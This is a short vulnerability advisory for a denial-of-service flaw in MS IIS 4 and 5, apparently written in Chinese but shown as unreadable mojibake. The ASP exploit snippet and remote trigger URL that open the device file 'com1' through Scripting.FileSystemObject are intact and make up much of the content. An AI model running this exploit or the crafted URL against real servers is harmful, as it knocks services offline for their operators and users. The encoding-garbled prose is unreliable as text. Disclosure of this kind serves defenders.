Éæ¼°³ÌÐò£º MS IIS
ÃèÊö£º ÀûÓÃÉ豸Îļþµ¼Ö MS IIS ¾Ü¾ø·þÎñ©¶´
Ïêϸ£º ·¢ÏÖ MS IIS ´æÔÚ±¾µØºÍÔ¶³Ì¾Ü¾ø·þÎñ©¶´¡£µ±Ê¹Óà Scripting.FileSystemObject ´ò¿ª»ò¶ÁÈ¡É豸Îļþʱ (com1, com2, etc.) ½«»áµ¼Ö ASP-processor (asp.dll) Í£Ö¹ÏìÓ¦¡£
¶ÔÓÚ±¾µØ¹¥»÷Õߣ¬Èç¹ûÓд´½¨ .asp ÎļþµÄȨÏÞ£¬½«Äܵ¼Ö·þÎñÆ÷µ±»ú¡£
¶ÔÓÚÔ¶³Ì¹¥»÷£¬µ±²ÎÊý±»½âÎö³ÉÉ豸Îļþʱ£¬½«»áµ¼Ö·þÎñÆ÷µ±»ú£º http://host.int/scripts/script.asp?script=com1
ÒÔÏ´úÂë½ö½öÓÃÀ´²âÊÔºÍÑо¿Õâ¸ö©¶´£¬Èç¹ûÄú½«ÆäÓÃÓÚ²»Õýµ±µÄ;¾¶Çëºó¹û×Ô¸º
ASP-Exploit:
<% Dim strFileName, objFSO, objFile
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strFileName = "com1"
Set objFile = objFSO.OpenTextFile(strFileName)
Response.Write objFile.ReadAll
objFile.Close
%>
ÊÜÓ°Ïìϵͳ£º IIS 4,5
½â¾ö·½°¸£º ÐÞ²¹ Scripting.FileSystemObject £¬Ê¹ËüÔÚ´ò¿ªÒ»¸öÎļþ֮ǰ±ØÐë¼ì²éÆäÊÇ·ñ´æÔÚ |